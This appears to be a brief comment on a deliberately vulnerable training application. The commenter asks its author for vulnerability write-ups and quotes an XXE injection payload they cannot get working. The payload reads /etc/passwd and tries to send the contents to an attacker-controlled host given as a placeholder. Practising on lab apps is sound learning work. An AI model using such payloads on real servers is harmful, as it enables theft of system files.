Firstly thank you for this application. Can you provide write-up of vulnerabilities ?. For example i'm still stuck in XXE Injection : <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY % xxe SYSTEM "file:///etc/passwd" > <!ENTITY callhome SYSTEM "@IP/?%xxe;"> ] > <foo>&callhome;</foo> @stephenbradshaw